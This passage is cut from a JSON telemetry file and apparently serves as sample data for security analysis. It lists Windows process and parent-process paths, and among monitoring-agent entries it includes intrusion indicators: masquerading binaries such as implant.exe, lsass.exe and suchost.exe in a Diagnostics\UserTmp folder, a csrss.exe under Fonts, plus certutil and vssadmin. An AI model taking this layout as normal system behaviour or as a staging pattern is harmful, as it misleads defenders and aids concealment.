State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft 